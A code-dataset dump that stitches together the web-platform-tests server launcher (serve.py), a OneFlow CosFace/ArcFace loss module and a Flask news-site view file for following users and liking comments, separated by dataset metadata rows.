with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, routes, **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
while (all(subproc.is_alive() for subproc in iter_procs(servers)) and
not received_signal.is_set() and not kwargs["exit_after_start"]):
for subproc in iter_procs(servers):
subproc.join(1)
failed_subproc = 0
for subproc in iter_procs(servers):
if subproc.is_alive():
logger.info('Status of subprocess "%s": running' % subproc.name)
else:
if subproc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly' % subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d' % (subproc.name, subproc.exitcode))
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
| 35.890533
| 141
| 0.577666
|
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_metadata(self, request):
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
return None
@abc.abstractproperty
def wrapper(self):
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
pass
@abc.abstractmethod
def check_exposure(self, request):
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
value = value.replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(aliases, config=None):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config, routes):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interpets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropraite
# for this context. These systems do not reserve any value for this
# purpose, so the inavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
continue
for port in ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"quic-transport": start_quic_transport_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(log=True):
# Log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719
if log:
logger.critical(EDIT_HOSTS_HELP)
else:
print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr)
sys.exit(1)
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed()
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
print("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(log=False)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(log=False)
class QuicTransportDaemon(object):
def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None):
args = ["python3", "wpt", "serve-quic-transport"]
if host:
args += ["--host", host]
if port:
args += ["--port", str(port)]
if private_key:
args += ["--private-key", private_key]
if certificate:
args += ["--certificate", certificate]
if handlers_path:
args += ["--handlers-path", handlers_path]
if log_level == "debug":
args += ["--verbose"]
self.command = args
self.proc = None
def start(self, block=False):
if block:
subprocess.call(self.command)
else:
def handle_signal(*_):
if self.proc:
try:
self.proc.terminate()
except OSError:
# It's fine if the child already exits.
pass
self.proc.wait()
sys.exit(0)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
self.proc = subprocess.Popen(self.command)
# Give the server a second to start and then check.
time.sleep(1)
if self.proc.poll():
sys.exit(1)
def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return QuicTransportDaemon(host,
port,
private_key=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
log_level=config.log_level)
except Exception:
startup_failed(log=False)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443, 8444],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
def run(config_cls=ConfigBuilder, route_builder=None, **kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(config, routes)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, routes, **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
while (all(subproc.is_alive() for subproc in iter_procs(servers)) and
not received_signal.is_set() and not kwargs["exit_after_start"]):
for subproc in iter_procs(servers):
subproc.join(1)
failed_subproc = 0
for subproc in iter_procs(servers):
if subproc.is_alive():
logger.info('Status of subprocess "%s": running' % subproc.name)
else:
if subproc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly' % subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d' % (subproc.name, subproc.exitcode))
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
| true
| true
|
1c44615cab2746c171e94d3955b5d0b53fc86e1b
| 1,605
|
py
|
Python
|
Vision/oneflow_face/utils/losses.py
|
mls1999725/models
|
77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02
|
[
"Apache-2.0"
] | 43
|
2021-06-03T09:07:08.000Z
|
2022-03-31T15:21:48.000Z
|
Vision/oneflow_face/utils/losses.py
|
mls1999725/models
|
77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02
|
[
"Apache-2.0"
] | 64
|
2021-05-31T10:34:06.000Z
|
2022-01-17T03:44:58.000Z
|
Vision/oneflow_face/utils/losses.py
|
mls1999725/models
|
77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02
|
[
"Apache-2.0"
] | 37
|
2021-07-04T03:13:18.000Z
|
2022-03-25T07:30:47.000Z
|
import oneflow as flow
from oneflow import nn
def get_loss(name):
if name == "cosface":
return CosFace()
elif name == "arcface":
return ArcFace()
else:
raise ValueError()
class CrossEntropyLoss_sbp(nn.Module):
def __init__(self):
super(CrossEntropyLoss_sbp, self).__init__()
def forward(self, logits, label):
loss = flow._C.sparse_softmax_cross_entropy(logits, label)
loss = flow.mean(loss)
return loss
def get_loss(name):
if name == "cosface":
return CosFace()
elif name == "arcface":
return ArcFace()
else:
raise ValueError()
class CosFace(nn.Module):
def __init__(self, s=64.0, m=0.40):
super(CosFace, self).__init__()
self.s = s
self.m = m
def forward(self, cosine, label):
index = flow.where(label != -1)[0]
m_hot = flow.zeros(index.size()[0], cosine.size()[1], device=cosine.device)
m_hot = flow.scatter(m_hot, 1, label[index, None], self.m)
cosine = cosine[index] - m_hot
ret = cosine * self.s
return ret
class ArcFace(nn.Module):
def __init__(self, s=64.0, m=0.5):
super(ArcFace, self).__init__()
self.s = s
self.m = m
def forward(self, cosine: flow.Tensor, label):
index = flow.where(label != -1)[0]
m_hot = flow.zeros(index.size()[0], cosine.size()[1], device=cosine.device)
m_hot.scatter_(1, label[index, None], self.m)
cosine.acos_()
cosine[index] += m_hot
cosine.cos_().mul_(self.s)
return cosine
| 25.078125
| 83
| 0.586293
|
import oneflow as flow
from oneflow import nn
def get_loss(name):
if name == "cosface":
return CosFace()
elif name == "arcface":
return ArcFace()
else:
raise ValueError()
class CrossEntropyLoss_sbp(nn.Module):
def __init__(self):
super(CrossEntropyLoss_sbp, self).__init__()
def forward(self, logits, label):
loss = flow._C.sparse_softmax_cross_entropy(logits, label)
loss = flow.mean(loss)
return loss
def get_loss(name):
if name == "cosface":
return CosFace()
elif name == "arcface":
return ArcFace()
else:
raise ValueError()
class CosFace(nn.Module):
def __init__(self, s=64.0, m=0.40):
super(CosFace, self).__init__()
self.s = s
self.m = m
def forward(self, cosine, label):
index = flow.where(label != -1)[0]
m_hot = flow.zeros(index.size()[0], cosine.size()[1], device=cosine.device)
m_hot = flow.scatter(m_hot, 1, label[index, None], self.m)
cosine = cosine[index] - m_hot
ret = cosine * self.s
return ret
class ArcFace(nn.Module):
def __init__(self, s=64.0, m=0.5):
super(ArcFace, self).__init__()
self.s = s
self.m = m
def forward(self, cosine: flow.Tensor, label):
index = flow.where(label != -1)[0]
m_hot = flow.zeros(index.size()[0], cosine.size()[1], device=cosine.device)
m_hot.scatter_(1, label[index, None], self.m)
cosine.acos_()
cosine[index] += m_hot
cosine.cos_().mul_(self.s)
return cosine
| true
| true
|
1c44621189b941c48d02923714b5af63f0aad611
| 9,678
|
py
|
Python
|
info/modules/news/views.py
|
wangjinyu124419/xinjing
|
205dd890b5d0baeae5935dfe24bd0208808e7e2b
|
[
"MIT"
] | null | null | null |
info/modules/news/views.py
|
wangjinyu124419/xinjing
|
205dd890b5d0baeae5935dfe24bd0208808e7e2b
|
[
"MIT"
] | null | null | null |
info/modules/news/views.py
|
wangjinyu124419/xinjing
|
205dd890b5d0baeae5935dfe24bd0208808e7e2b
|
[
"MIT"
] | null | null | null |
import logging
from flask import abort
from flask import g
from flask import request
from flask import session, jsonify
from info import constants, db
from info import response_code
from info.models import User, News,Comment, CommentLike
from info.utils.comment import user_login_data
from . import blue_news
from flask import render_template
@blue_news.route('/followed_user',methods=['GET','POST'])
@user_login_data
def followed_user():
"""关注和取消关注
1.判断用户是否登录
2.接受参数:user_id, action
3.校验参数:判断参数是否齐全,判断action是否在范围内
4.使用user_id查询要被关注的用户是否存在
5.如果要被关注的用户是存在的,再根据action实现关注和取消关注
6.同步数据库
7.响应结果
"""
# 1.判断用户是否登录: login_user 关注 other
login_user = g.user
if not login_user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
# 2.接受参数:user_id, action
user_id = request.json.get('user_id')
action = request.json.get('action')
# 3.校验参数:判断参数是否齐全,判断action是否在范围内
if not all([user_id, action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少参数')
if action not in ['follow', 'unfollow']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
# 4.使用user_id查询要被关注的用户是否存在:login_user 关注 other
try:
other = User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户数据失败')
if not other:
return jsonify(errno=response_code.RET.NODATA, errmsg='被关注的用户不存在')
# 5.如果要被关注的用户是存在的,再根据action实现关注和取消关注 (核心代码)
if action == 'follow':
# 关注
if other not in login_user.followed:
login_user.followed.append(other)
else:
# 取消关注
if other in login_user.followed:
login_user.followed.remove(other)
# 6.同步数据到数据库
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
# 7.响应结果
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
@blue_news.route('/comment_like',methods=['POST'])
@user_login_data
def comment_like():
#1.判断用户登陆
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
#2.接受参数,news_id,comment_id,action
json_dict = request.json
comment_id = json_dict.get('comment_id')
news_id = json_dict.get('news_id')
action = json_dict.get('action')
#3.校验参数齐全,action范围
if not all([comment_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
if action not in ['remove','add']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
#4.查询评论是否存在
try:
comment=Comment.query.get(comment_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询评论失败')
if not comment:
return jsonify(errno=response_code.RET.DBERR, errmsg='该评论不存在')
#5.更具action实现点赞动作
comment_like_mode=None
comment_like_mode = CommentLike.query.filter(CommentLike.comment_id == comment.id,
CommentLike.user_id == user.id).first()
if action=='add':
if not comment_like_mode:
comment_like_mode=CommentLike()
comment_like_mode.user_id=user.id
comment_like_mode.comment_id=comment_id
comment.like_count+=1
db.session.add(comment_like_mode)
else:
if comment_like_mode:
db.session.delete(comment_like_mode)
# 6.同步数据库
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
# 7.返回会响应
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
#新闻评论关注
